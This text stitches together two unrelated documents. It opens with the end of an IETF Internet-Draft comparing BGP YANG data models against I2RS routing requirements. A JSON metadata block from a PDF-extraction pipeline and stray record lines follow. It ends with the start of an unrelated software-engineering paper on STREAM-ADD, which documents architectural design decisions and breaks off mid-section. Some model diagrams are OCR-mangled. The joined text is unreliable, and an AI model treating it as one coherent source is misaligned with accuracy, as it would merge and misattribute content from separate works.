. . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* (ipv4 route ipv4-prefix-length
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+rw route-type? enumeration
+rw route-admin-distance uint32
+rw route-rpki-origin-validity
+--rw rt-rpki-origin-valid Boolean
+--rw rt-rpki-ref rpki-validity-ref
figure bgp-14
5.8. BGP-REQ 08
BGP-REQ08 requirement is: "I2RS Client SHOULD be able to read BGP route filter information from I2RS Agents associated with legacy BGP routers, and write filter information via the I2RS agent to be installed in BGP RR. The I2RS Agent SHOULD be able to install these routes in the BGP RR, and engage a BGP protocol action to push these routers to ASBR and PE routers."
Discussion: The router filter information is determined to be the prefix-filters or policy-filters associated with BGP routes found in the AFI based bgp-local-rib or peer’s structures (AdjRibIn, AdjRibOut).
Status:
[I-D.zhdankin-netmod-bgp-cfg] has prefix-lists which can allow or deny prefixes based on the NLRI. This yang model does not provide an easy way to detect peers as taking on the BGP RR, ABSR, and PE. (See section 3.3 and yang model for the prefix-list descriptions).
[I-D.wang-i2rs-bgp-dm] has the ability to specify flexible policy via policy-groups or policy sets for inbound and outbound policy that can filter based on prefix or any match sequence within the route and peer. This draft also provides a data model that tracks track which peers are ASBR, PEs, and RR at the peer level via bgp-peer-type and at the protocol level via bgp-role. (Please see draft-ietf-i2rs-hares-bnp-info-model and draft-itef-hares-i2rs-bnp-dm for full description).
5.9. BGP-REQ 09
BGP-REQ09: I2RS client(s) SHOULD be able to request the I2RS agent to read BGP routes with all BGP parameters that influence BGP best path decision, and write appropriate changes to the BGP Routes to BGP and to the RIB-Info in order to manipulate BGP routes.
Discussion: Best-path is considered when policy evaluation is the same. The best path could be considered based on origin-as, as-path, router-id, cost-community, igp-metric, med-confed, missing-as-med, rpki-origin validity. This requirement needs to be refined to specify an initial set of BGP parameters that influence BGP best path decisions.
Status:
[I-D.zhdankin-netmod-bgp-cfg] configures the parameters that influence BGP bestpath decisions. However, this draft does not provide these parameters within each bgp-route.
[I-D.wang-i2rs-bgp-dm] provides the per route status on origin-as, as-path, router-id, cost-community, igp-metric, MED, and rpki-origin validity. This route status is on the AFI level local-rib and the per peer routes (AdjRibIn, AdjRibOut).
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
+ . . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* (ipv4 route ipv4-prefix-length
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
+--rw route-admin-distance uint32
+--rw route-rpki-origin-validity
+--rw rt-rpki-origin-valid Boolean
+--rw rt-rpki-ref rpki-validity-ref
figure bgp-15
5.10. BGP-REQ 10
BGP-REQ10 requirement is: I2RS client SHOULD be able instruct the I2RS agent(s) to notify the I2RS client when the BGP processes on an associated routing system observe a route change to a specific set of IP Prefixes and associated prefixes. Route changes include: 1) prefixes being announced or withdrawn, 2) prefixes being suppressed due to flap damping, or 3) prefixes using an alternate best-path for a given IP Prefix. The I2RS agent should be able to notify the client via publish or subscribe mechanism.
Discussion: RFC5277 indicates that a netconf-filter looks for specific data value and data item. Therefore, the I2RS client must specify the whether the data is in the AFI based local-rib or the BGP (AdjRibIn, AdjRibOut) and the specific values. The specific values indicated by BGP-REQ-10 are prefixes with: announce flags, withdrawn flags, flap-dampened suppression flags, on-best-path-external or rejected due to best-path external. This comparison assumes the RFC5277 paths can be made to work for the ephemeral storage.
Sorting of these filters into critical or normal status requests is not considered in this comparison as adding this upon a non-existent definition of ephemeral services seems futile.
[I-D.zhdankin-netmod-bgp-cfg] configures the parameters that influence BGP bestpath decisions or flap damping. However, this draft does not provide these parameters within each bgp-route.
[I-D.wang-i2rs-bgp-dm]:
Hares Expires April 30, 2015 [Page 20]
typedef rib-state-def {
type enumeration {
enum "active";
enum "in-active";
enum "primary";
enum "backup";
enum "suppressed (flap dampened)"
enum "suppressed non-flap dampen"
enum "active on alternate best path"
}
Leaf not-preferred-reason {
Type enumeration {
enum "peer-address";
enum "router-id";
enum "cluster-list-length";
enum "igp-metric";
enum "peer-type";
enum "origin";
enum "weight-or-preferred-value";
enum "local-preference";
enum "route-type";
enum "as-path-length";
enum "med";
enum "flap-dampened route"; [new]
enum "not-this-path-prefix-uses-alternate-best-path"; [new]
enum "overlapping-route-marked-to-remove"; [new] (BGP-REQ17)
}
}
}
Figure bgp 16
Conclusion: [I-D.wang-i2rs-bgp-dm] status is needed for this BGP-REQ10.
5.11. BGP-REQ 11
BGP-REQ11 requirement is the "I2RS client SHOULD be able to read BGP route information from BGP routers on routes in received but rejected from ADJ-RIB-IN due to policy, on routes installed in ADJ-RIB-IN, but not selected as best path, and on route not sent to IBGP peers (due to non-selection)."
Discussion: As discussed in BGP-REQ10, RFC5277 indicates that a netconf-filter looks for specific data value and data item. Therefore, the I2RS client must specify the whether the data is in the AFI based local-rib, or the BGP (AdjRibIn, AdjRibOut) and the specific values
Status:
[I-D.zhdankin-netmod-bgp-cfg] configures policy that indicates what routes are filtered, but it does not provide the status parameter on each BGP route.
[I-D.wang-i2rs-bgp-dm]: Shows that the status can be tracked in the AFI based bgp local-rib and the per AFI per peer AdjRibIn and AdjRib out.
Conclusion: [I-D.wang-i2rs-bgp-dm] status is needed for BGP-REQ10.
5.12. BGP-REQ 12
BGP-REQ12 requirement is: the "I2RS client SHOULD be able to request the I2RS agent to read installed BGP Policies."
Discussion: BGP policies can be inbound filters, ACLs, or route maps. Three yang drafts take different approaches to the filters: draft-bogdanovic-netmod-acl-model-02, [I-D.zhdankin-netmod-bgp-cfg], and draft-hares-2rs-bnp-dm-01.
The draft-bogdanovic-netmod-acl-model-02 takes the approach of extending the firewall ACLs, and suggests that proprietary methods be used to extend this to the ranges needed for BGP policy. The index to the ACLS is the rule-name. For a single prefix accept/deny the generic ACL policy may be sufficient. Prefix ranges or the ability to set custom cost communities or other extended communities must use a proprietary vendor’s model.
The [I-D.zhdankin-netmod-bgp-cfg] (10/1/2014) suggests prefix-list matches that should provide prefix matches an index of route ID number (uint16). The prefix matches can be either ip-address, prefix, host address, or prefix-range. The only actions taken are
accept or deny the prefix. The usage statistics contains only the "hit count" for the usage of the prefix mask.
The [I-D.wang-i2rs-bgp-dm] (10/23/2014) provides a policy link to the Basic Network Policy (draft-hares-i2rs-bnp-info-model/draft-hares-i2rs-bnp-dm-01) which provides ordered list of policy rules that can provide sequences of match, actions (accept/deny, set variable, and modify). A group of these policy rules is called a policy group which can be named.
This model uses the policy definitions concept is also found in the Policy Core Information Model (PCIM) (RFC3060) and the Quality of Service QoS Policy Information Model (QPIM) (RFC3644) and policy based routing. ACL-based policy (draft-bogdanovic-netmod-acl-model-02), and prefix-list policy (accept/deny) can be one of the policy rule extensions. The [I-D.zhdankin-netmod-bgp-cfg] can provide a second policy rule extension.
The section below provides the specific modeling parameters for each draft.
draft-bogdanovic-netmod-acl-model-02
```
+-rw access-list-entry* [rule-name]
+-rw rule-name string
+-rw matches
| +-rw (ace-type)?
| +-:(ace-ip)
| | +-rw source-port-range
| | +-rw lower-port inet:port-number
| | +-rw upper-port? inet:port-number
| +-rw destination-port-range
| | +-rw lower-port inet:port-number
| | +-rw upper-port? inet:port-number
| +-rw dscp? inet:dscp
| +-rw ip-protocol? uint8
| +-rw (ace-ip-version)?
| +-:(ace-ipv4)
| | +-rw destination-ipv4-address?
| | inet:ipv4-prefix
| | +-rw source-ipv4-address?
| | inet:ipv4-prefix
| +-:(ace-ipv6)
| | +-rw destination-ipv6-address?
| | inet:ipv6-prefix
| | +-rw source-ipv6-address?
| | inet:ipv6-prefix
| +-rw flow-label? inet:ipv6-flow-label
```
Internet-Draft IM for policy October 2014
---:(ace-eth)
---rw destination-mac-address?
yang:mac-address
---rw destination-mac-address-mask?
yang:mac-address
---rw source-mac-address?
yang:mac-address
---rw source-mac-address-mask?
yang:mac-address
---rw input-interface?
string
---rw absolute
---rw start?
yang:date-and-time
---rw end?
yang:date-and-time
---rw active?
boolean
---rw actions
---rw (packet-handling)?
---:(deny)
| ---rw deny?
empty
---:(permit)
---rw permit?
empty
---ro ace-oper-data
---ro match-counter?
ietf:counter64
Figure bgp-17
[I-D.zhdankin-netmod-bgp-cfg] (10/1/2014)
---rw prefix-lists
---rw prefix-list [prefix-list-name]
---rw prefix-list-name
string
---rw prefixes
---rw prefix [seq-nr]
---rw seq-nr uint16
---rw prefix-filter
---rw (ip-address-group)?
(cases
+---rw action
actions-enum
+---rw statistics
Figure bgp-18
[I-D.wang-i2rs-bgp-dm]
5.13. BGP-REQ 13
BGP-REQ13 requirement is: the "I2RS client SHOULD be able to instruct the I2RS Agent to write BGP Policies into the running BGP protocols and into the BGP configurations."
Discussion: BGP-REQ 13 indicates that the policy changes supported by BGP-REQ 12 must be able to operate in the running configuration. The I2RS and netmod groups are discussing the definition of ephemeral. Two definitions are being discussed - patch and pull-up configuration as described below:
running = config + ephemeral patches [patch]
running = config (copy) + ephemeral additions (pull-up)
Either definition implies that the I2RS changes can alter the policy based on the bgp configuration and I2rs model.
The writing of changes from I2RS to the configuration was specifically ignored. Writing of specific configuration options from the ephemeral store to the running configuration can initially be done by the I2RS client writing via the configuration interface to the datastore.
Data models needed: The Policy data models for filter or filter and action are the same as in BGP-REQ13.
5.14. BGP-REQ 14
BGP-REQ14 requirement is: the "I2RS client-agent SHOULD be able to read BGP statistics associated with Peer, and to receive notifications when certain statistics have exceeded limits. An example of one of these protocol statistics is the max-prefix limit."
Discussion: BGP-REQ01 examines the peer connectivity state. BGP-REQ14 examines BGP peer statistics. [I-D.zhdankin-netmod-bgp-cfg] provides statistics on the number of updates received or sent, but it does not have statistics on the max-prefix exceeded. It does provide a limit for maximum-prefix per peer.
[I-D.wang-i2rs-bgp-dm] has statistics on the number of updates received or sent, number of routes received or sent plus maximum prefix high-water and low-water. This draft also has the limits copied into the status fields for easy reading.
[I-D.zhdankin-netmod-bgp-cfg] (10/1/2014)
module: bgp
+ ....
+--rw bgp-neighbors
| +--rw bgp-neighbor [as-number]
| +--rw as-number uint32
| +--rw (peer-address-type)?
| ....
| +--rw prefix-list? prefix-list-ref
| +--rw default-action? actions-enum
| +--rw af-specific-config
| +--ro bgp-neighbor-state
| +--ro bgp-peer-admin-status;
| +--ro bgp-neighbor-statistics
| +--ro nr-in-updates
| +--rw nr-out-updates
[I-D.wang-i2rs-bgp-dm]
Conclusion: Full support of BGP-REQ 14 requires the [I-D.wang-i2rs-bgp-dm] draft.
5.15. BGP-REQ 15
BGP-REQ15 requirement is: the "I2RS client via the I2RS agent MUST have the ability to read the loc-RIB-In BGP table that gets all the routes that the CE has provided to a PE router."
Discussion: The [I-D.zhdankin-netmod-bgp-cfg] provides no indication of a local-rib or a local-RIB-in associated with a BGP peer. The [I-D.wang-i2rs-bgp-dm] provides a local-rib per AFI, and a local-RIB-IN (AdjRIBIn and AdjRIBOut) associated with each peer. The route table format is presented in figure bgp-9.
Conclusion: [I-D.wang-i2rs-bgp-dm] is necessary for this requirement.
5.16. BGP-REQ 16
BGP-REQ16 requirement is: the "I2RS client via the I2RS agent MUST have the ability to install destination based routes in the local RIB of the PE devices. This must include the ability to supply the destination prefix (NLRI), a table identifier, a route preference, a
route metric, a next-hop tunnel through which traffic would be carried."
Discussion: If this refers to the I2RS LOC-rib, then both drafts have policy which could redistribute I2RS routes.
If BGP-REQ 16 refers to a BGP local-rib per AFI and the bgp-peer based bgp-rib-in (AdjRibIn) and bgp-rib-out (AdjRibOut). As this previous discussion indicates, the [I-D.zhdankin-netmod-bgp-cfg] does not have a local rib-in.
The document [I-D.wang-i2rs-bgp-dm] describes a per AFI bgp local-rib and the per peer bgp-rib-in (AdjRIBIn) and bgp-rib-out (AdjRibOut). The routes in these RIBs fall under a table identifier structure and have a destination prefix (NLRI), route administrative preference, route local-reference, and a next-hop. However, [I-D.wang-i2rs-bgp-dm] does not have a tunnel based definition for the next-hop. This would need to be added.
Conclusion: Additions to [I-D.wang-i2rs-bgp-dm] may need to be made to fulfill this requirement.
5.17. BGP-REQ 17
BGP-REQ17 requirement is: the "I2RS client via the I2RS agent SHOULD have the ability to read the loc-RIB-in BGP table to discover overlapping routes, and determine which may be safely marked for removal."
Discussion: As discussed in BGP-REQ15 and BGP-REQ16, draft [I-D.zhdankin-netmod-bgp-cfg] does not have a local-RIB-In BGP table. [I-D.wang-i2rs-bgp-dm] has a BGP local-rib per AFI and a per BGP Peer bgp-rib-in. As described in BGP REQ10, this each route may set a "remove overlapping route" status flag.
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ 17.
5.18. BGP-REQ 18
BGP-REQ18 requirement is the "I2RS client via the I2RS Agent SHOULD have the ability to modify filtering rules and initiate a re-computation of the local BGP table through those policies to cause specific routes to be marked for removal at the outbound eBGP edge."
Discussion: This feature requires that I2RS should be able to do a re-computation of policies. This re-computation of policies is part of a soft-reconfig which [I-D.zhdankin-netmod-bgp-cfg] allows by
configuration. However, the I2RS client will need a parameter to be set to do a reconfigure.
Neither [I-D.zhdankin-netmod-bgp-cfg] or [I-D.wang-i2rs-bgp-dm] have this feature.
Conclusion: This feature needs to be added to final model
6. IANA Considerations
This draft includes no request to IANA.
7. Security Considerations
TBD
8. Informative References
[I-D.bogdanovic-netmod-acl-model]
[I-D.hares-i2rs-bgp-dm]
[I-D.hares-i2rs-info-model-service-topo]
[I-D.hares-i2rs-usecase-reqs-summary]
Hares, S., "Summary of I2RS Use Case Requirements", draft-hares-i2rs-usecase-reqs-summary-00 (work in progress), July 2014.
[I-D.ietf-i2rs-architecture]
[I-D.ietf-i2rs-rib-info-model]
[I-D.wang-i2rs-bgp-dm]
[I-D.zhdankin-netmod-bgp-cfg]
Author’s Address
Susan Hares
Huawei
7453 Hickory Hill
Saline, MI 48176
USA
Email: shares@ndzh.com
|
{"Source-Url": "http://www.watersprings.org/pub/id/draft-hares-i2rs-bgp-compare-yang-01.pdf", "len_cl100k_base": 11494, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 59037, "total-output-tokens": 13763, "length": "2e13", "weborganizer": {"__label__adult": 0.0003695487976074219, "__label__art_design": 0.000499725341796875, "__label__crime_law": 0.0005793571472167969, "__label__education_jobs": 0.0016307830810546875, "__label__entertainment": 0.00030303001403808594, "__label__fashion_beauty": 0.0001982450485229492, "__label__finance_business": 0.0009317398071289062, "__label__food_dining": 0.00029754638671875, "__label__games": 0.001255035400390625, "__label__hardware": 0.005092620849609375, "__label__health": 0.00033855438232421875, "__label__history": 0.0007524490356445312, "__label__home_hobbies": 0.00011074542999267578, "__label__industrial": 0.0008745193481445312, "__label__literature": 0.0005536079406738281, "__label__politics": 0.0006670951843261719, "__label__religion": 0.0004661083221435547, "__label__science_tech": 0.396728515625, "__label__social_life": 0.00015985965728759766, "__label__software": 0.096435546875, "__label__software_dev": 0.48974609375, "__label__sports_fitness": 0.000339508056640625, "__label__transportation": 0.0013332366943359375, "__label__travel": 0.00025725364685058594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 44458, 0.02749]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 44458, 0.16446]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 44458, 0.76252]], "google_gemma-3-12b-it_contains_pii": [[0, 1746, false], [1746, 4490, null], [4490, 6656, null], [6656, 8691, null], [8691, 9961, null], [9961, 11763, null], [11763, 12992, null], [12992, 13930, null], [13930, 15460, null], [15460, 17053, null], [17053, 17305, null], [17305, 18814, null], [18814, 20281, null], [20281, 21054, null], [21054, 22195, null], [22195, 23211, null], [23211, 24998, null], [24998, 26941, null], [26941, 28471, null], [28471, 30467, null], [30467, 31338, null], [31338, 33362, null], [33362, 35321, null], [35321, 36419, null], [36419, 37783, null], [37783, 38911, null], [38911, 39867, null], [39867, 41885, null], [41885, 43180, null], [43180, 44458, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1746, true], [1746, 4490, null], [4490, 6656, null], [6656, 8691, null], [8691, 9961, null], [9961, 11763, null], [11763, 12992, null], [12992, 13930, null], [13930, 15460, null], [15460, 17053, null], [17053, 17305, null], [17305, 18814, null], [18814, 20281, null], [20281, 21054, null], [21054, 22195, null], [22195, 23211, null], [23211, 24998, null], [24998, 26941, null], [26941, 28471, null], [28471, 30467, null], [30467, 31338, null], [31338, 33362, null], [33362, 35321, null], [35321, 36419, null], [36419, 37783, null], [37783, 38911, null], [38911, 39867, null], [39867, 41885, null], [41885, 43180, null], [43180, 44458, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 44458, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 44458, null]], "pdf_page_numbers": [[0, 1746, 1], [1746, 4490, 2], [4490, 6656, 3], [6656, 8691, 4], [8691, 9961, 5], [9961, 11763, 6], [11763, 12992, 7], [12992, 13930, 8], [13930, 15460, 9], [15460, 17053, 10], [17053, 17305, 11], [17305, 18814, 12], [18814, 20281, 13], [20281, 21054, 14], [21054, 22195, 15], [22195, 23211, 16], [23211, 24998, 17], [24998, 26941, 18], [26941, 28471, 19], [28471, 30467, 20], [30467, 31338, 21], [31338, 33362, 22], [33362, 35321, 23], [35321, 36419, 24], [36419, 37783, 25], [37783, 38911, 26], [38911, 39867, 27], [39867, 41885, 28], [41885, 43180, 29], [43180, 44458, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 44458, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
a4d49e491524ac23508939a033ef82c3bdbc2c32
|
STREAM-ADD – Supporting the Documentation of Architectural Design Decisions in an Architecture Derivation Process
Diego Dermeval¹, João Pimentel¹, Carla Silva¹, Jaelson Castro¹, Emanuel Santos¹, Gabriela Guedes¹
¹Centro de Informática, Universidade Federal de Pernambuco – UFPE
{ddcm,jhcp,ctlls,jbc,eb,sg}@cin.ufpe.br
Márcia Lucena², Anthony Finkelstein³
²Departamento de Informática e Matemática Aplicada, Universidade Federal do Rio Grande do Norte – UFRN
marciaj@dimap.ufrn.br
³Department of Computer Science, University College London – UCL
a.finkelstein@ucl.ac.uk
Abstract – Requirements Engineering and Architectural Design are activities of the software development process that are strongly related and intertwined. Thus, providing effective methods of integration between requirements and architecture is an important Software Engineering challenge. In this context, the STREAM process presents a model-driven approach to generate early software architecture models from requirements models. Despite being a systematic derivation approach, STREAM does not support the documentation of architectural decisions and their corresponding rationale. Recent studies in the software architecture community have stressed the need to treat architectural design decisions and their rationale as first class citizens in software architecture specification. In this paper we define an extension of this process, named STREAM-ADD (Strategy for Transition between Requirements and Architectural Models with Architectural Decisions Documentation). This extended process aims to systematize the documentation of architectural decisions by the time they are made and to support the refinement of the architecture according to such decisions. In order to illustrate our approach, it was applied for creating the architecture specification of a route-planning system.
Keywords – Requirements Engineering; Software Architecture; Architectural Decisions; Software Architecture Documentation; Architectural Knowledge
I. INTRODUCTION
Requirements Engineering (RE) and Architectural Design are initial activities of the software development process strongly related and overlapped [1]. In this context, some efforts have been done to understand the integration between these activities [2, 3, 4]. More specifically, some works present systematic methods to design software architecture from goal-oriented RE approaches [5, 6, 7, 8]. In particular, the STREAM (Strategy for Transition between REquirements and Architectural Models) process [8] presents a model-driven approach for generating initial architectures - in Acme [9] - from i* requirements models [10]. It consists of the following steps: (i) Requirements Refactoring, (ii) Generate Architectural Model and (iii) Refine Architecture. Horizontal and vertical model-transformation rules were proposed to aid the steps (i) and (ii), respectively. Lastly, in step (iii) the architecture is refined by using architectural styles.
The architecture obtained from the STREAM process is represented in Acme using components and connectors. However, this representation is not sufficient. According to [11], software architecture must be sufficiently abstract to be quickly understood by new staff, concrete enough to serve as a blueprint for the development team and should contain sufficient information to serve as a basis for system analysis.
Moreover, recent studies have emphasized the need to treat architectural design decisions and their rationale as first class citizens in the software architecture specification [12, 13, 14]. Thus, it is necessary to include activities for documenting, capturing and managing architectural decisions in the architectural design process. In fact, performing these activities implies in an extra effort that can be compensated by some benefits obtained later in the software development process [11]. For example, traceability between requirements models and architectural models is produced during the software life cycle [14]. Traceability along with (architectural decision-making) rationale documentation enables estimating more precisely the impact of changes in requirements or architecture and decreasing costs of software maintenance [15]. Besides, documenting the rationale associated to the architectural decision-making process aids the communication between the stakeholders and serves as an auxiliary memory for the architect [14].
Facing the potential benefits of documenting architectural design decision, we propose the STREAM-ADD (Strategy for Transition between Requirements and Architectural Models with Architectural Decisions Documentation) process, an extension of the STREAM process to guide the documentation of architectural decisions and the refinement of the architectural model according to the decisions taken.
The remainder of this paper is organized as follows. Section II briefly describes our running example, the BTW route-planning system, along with the main concepts of i* language. Section III gives an overview of our approach. Section IV describes the activities of the STREAM-ADD process, applying them to the running
example. Section V discusses related works. Finally yet importantly, Section VI summarizes our work, presents our conclusions and points out future works.
II. RUNNING EXAMPLE
This section briefly describes the BTW (By The Way) system, which is going to be used to illustrate our approach. The BTW system [16] consists on a route-planning system that helps users define a specific route through advices given by another user. This information might be filtered to provide only relevant information about the place that a user intends to visit.
Fig. 1 presents an excerpt of the requirements model of the BTW system, represented with the i* notation [10]. Using i*, we can describe both the system and its environment in terms of intentional dependencies among actors. In a dependency, an actor, called a depender, requires a dependum that can be provided by an actor, called dependee. The dependum may be a goal, a softgoal, a task or a resource. Goals represent the intentions, needs or objectives of an actor. Softgoals are objectives of subjective nature – they are generally used to express non-functional requirements. The tasks represent a way to perform some action to obtain the satisfaction of a goal or a softgoal. The resources denote data, information or a physical resource that an actor may provide or receive.
In Fig. 1 there is an actor which represents the software system to be developed (BTW), actors illustrative of human agents (Travelers, that can be Advice Giver and Advice Receiver), and an actor on behalf of an external system (Internet Provider). The software system actor (BTW) is also refined in the SR (Strategic Rationale) model by exploiting its internal details to describe how the dependencies are accomplished. For the sake of space, the SR model of BTW system is suppressed in this paper; however it can be seen in [8].
III. STREAM-ADD OVERVIEW
The goal of the original STREAM process is to generate architectural models, in Acme, from requirements models in i*, by using model transformations [8]. That process has an activity focused on the refinement of architectural models by the application of architectural styles and architectural refinement patterns. However, this activity is not entirely systematized and does not allow the documentation of the rationale involved in the decision-making performed during the architectural design refinement.
To overcome this limitation, we have defined the STREAM-ADD process, which is an extension of the STREAM process richer support to making and documenting architectural decisions. The three activities of this new process are depicted in Fig. 2. The first two activities, Requirements Refactoring and Generate Architectural Model, were maintained as-is from the original STREAM [8]. The last activity (Refine Architectural Model With Architectural Decisions) has been extended to support the documentation of architectural decisions and to make the architectural refinement more systematic.
The Requirements Refactoring activity is concerned with the modularization of the i* model. It is a first step towards identifying the system’s components. To achieve this, a set of model transformation rules is applied [17]. During the Generate Architectural Model activity the requirements model is mapped onto components and connectors of an early architectural model also, based on a set of model transformation rules.
Before presenting the last activity, we apply the two first activities to our running example, the BTW system. The Requirements Refactoring activity relies on using a decomposition criterion based on the separation and modularization of elements or concerns that are not strongly related to the application domain. Fig. 1 illustrates the i* model for the BTW system obtained as result of this activity. The highlighted elements in Fig. 1 represent new system actors, which are linked to the BTW itself.
During the Generate Architectural Model activity, transformation rules are used to translate the modular i* model (Fig. 1) onto an early architecture model in Acme [8]. The main elements of Acme are components, connectors, ports, roles, and representations. Acme components represent computational units of a system. Connectors represent and mediate interactions between components. Ports correspond to external interfaces of components. Roles represent external interfaces of connectors. Thus, ports and roles are points of interaction,
respectively, between components and connectors. Representations allow a component, connector, port, or role to describe its design in detail by specifying a sub-architecture that refines the parent element.
The transformation rules provided in this activity define the mapping from $i^*$ actors to Acme components, and from $i^*$ dependencies to Acme connectors and ports. Applying this mapping to our running example (Fig. 1), seven components are generated: BTW system (the main actor); User Access Controller, Map Information Publisher and Mapping Handler (actors not related to the application domain); Advice Giver, Advice Receiver and Internet Provider. Fig. 3 shows the early architectural model mapped from the $i^*$ model. More details about the systematic application of these activities can be found in [8].

Figure 3. The result of mapping the BTW system model from $i^*$ to Acme
In the following section we will focus on the Refine Architecture With Architectural Decisions sub-process, since it is the novel contribution of this present work.
**IV. STREAM-ADD – ARCHITECTURAL MODEL REFINEMENT**
The Refine Architectural Model With Architectural Decisions sub-process aims to refine the early architectural model, mapped from the $i^*$ model, by making and documenting architectural decisions. To do so, we designed a template (based on [12][13][18]) that relates the requirements ($i^*$) and architecture (Acme) models used in the process. The defined template contains the following fields: Requirements, Stakeholders, Non-Functional Requirements, Alternative solutions, Rationale, Decision, Design Fragment, Group, Status, Related artifacts, Phase/Iteration, Consequences, and Dependencies. This template will be used to document architectural decisions made during this sub-process.
Moreover, to define the activities of this sub-process, we analyzed a classification scheme of architectural decisions presented in [13]. Our sub-process supports Existence Decisions related to structural aspects and Executive Decisions related to technology aspects.
Hereafter, we briefly describe each of these architectural decisions types used in the STREAM-ADD process.
Existence Decisions state that some element/artifact will positively be included in the architecture. This concerns both structural and behavioral decisions. Structural decisions lead to the creation of subsystems, layers, partitions and components in some view of the architecture. Behavioral decisions are related to how the elements interact together to provide functionality or to satisfy some non-functional requirement. Executive Decisions do not relate directly to the design elements or their qualities, but are essentially driven by the business environment, and affect the development process, the people, the organization, and to a large extent the choices of technologies and tools, e.g., the programming language to be used.
Fig. 4 presents the activities that constitute the Refine Architectural Model With Architectural Decisions sub-process. It is worth noting that we do not intend to guide architectural decision-making in this process, but rather to guide the documentation of these decisions, at the moment they are made, using a specific template. Fig. 5 will show the refinement of the BTW early architectural model after making and documenting one structural and one technology decision.

Figure 4. The Refine Architectural Model With Architectural Decisions sub-process
**A. Structural Decisions Documentation**
We consider as structural the following types of decisions: (i) architectural style application; (ii) refinement pattern application to specific non-functional requirements [5]; and (iii) component decomposition. The inputs of this activity are the modular $i^*$ model, the early architectural model, the documentation template and a NFRs list. This activity will be illustrated with an architectural style decision in the BTW system.
In the following we describe a set of steps that must be performed to fill the documentation template for each architectural decision made for a system. For the sake of space, here we are going to focus only on the architectural style decision.
1) **Identify Requirements and Stakeholders Addressed by the Decision**
In this step, the requirements and stakeholders related to a decision are identified and documented in the template – the former in the Requirements and NFRs
fields, the latter in the Stakeholders fields. The Requirements field captures intentional elements of i* models, i.e., goals, tasks, resources and softgoals that influence the current decision-making. The Stakeholders field captures the stakeholders interested in these requirements. They may be actors in i* model that have dependency links with the identified requirements or actors from the organization that is developing the system, e.g., project manager, client, quality assurance staff, and so on.
In addition, considering the three types of NFRs – Product NFRs, External NFRs and Process NFRs [19] – the first type refers to NFRs that are essentially quality attributes of a product (e.g. performance). Thus, in this paper we consider that Product NFRs and softgoals are semantically equivalent. The second and third types influence architectural alternatives to consider during the decision-making process (e.g. use Free/Libre and Open Source Software technologies). However, these two NFR types are not usually represented in i* models. Hence, the External and Process NFRs are recorded in NFR field of the documentation template, as shown in the next step.
Table I – BTW system NFRs list
<table>
<thead>
<tr>
<th>Softgoals</th>
<th>Other NFRs</th>
</tr>
</thead>
<tbody>
<tr>
<td>Usability, Performance,</td>
<td>Minimize Costs; Minimize</td>
</tr>
<tr>
<td>Security; Recommendation</td>
<td>Development Time; Maximize</td>
</tr>
<tr>
<td>Relevance; Precise Advices.</td>
<td>Mashup Engineering.</td>
</tr>
</tbody>
</table>
Table I illustrates the list of NFRs for our running example. This list is an input of the Structural Decisions Documentation activity. Softgoals were captured from the i* model (Fig. 1) and NFRs were identified from other artifacts of the BTW system, especially the project plan [16]. Since we are considering an architectural style decision, and Product NFRs (softgoals) affect the software architecture globally [7], the Requirements field of the template (Table II) is filled with all softgoals presented in Table I. The Stakeholders field of the template is filled with a non-software actor present in Fig. 1 that has some dependency with these softgoals – in this case, the Traveller actor. The “NFRs” field is empty because it was noticed that the system’ NFRs do not affect the architectural style decision.
2) Identify Architectural Alternatives
This step is concerned with considering possible architectural alternatives to attend the captured requirements. These alternative solutions will be recorded in the Alternatives field of the documentation template. For the case of identifying a suitable set of alternatives for deciding which architectural style to apply, we suggest consulting architectural style catalogues (such as [20]). By analyzing such catalogues, we identified two possible styles that could be applied to the early architectural model of the BTW system (Fig. 3): Model-View-Controller and Layers. So, the field “Alternatives” of the template documenting this decision is filled with these architectural alternatives (Table II).
Table II – Documentation Template for the Apply Layers Architectural Style Architectural Decision
3) Perform Contribution Analysis of Alternatives
In this step, a contribution analysis is performed, based on [21]. The identified alternatives may contribute (negatively or positively) to the fulfillment of the softgoals and the NFRs documented in the template. Contributions are represented by a link whose source is an architectural alternative and whose target is a softgoal or a NFR. Each link has a label to express different kinds of contributions to the source to the target element: help (positive contributions), hurt (negative contributions) and unknown (neutral contributions).
The contribution analysis performed in this step for our running example was aided by the catalog presented in [20]. By consulting this catalog we have identified that, in general, the layer architectural style has neutral impact on Performance and Usability, and positive impact on Security. Additionally, we considered that the layer architectural style does not impact the Precise Advices and Recommendation Relevance softgoals. Therefore, this alternative has a neutral impact on these softgoals.
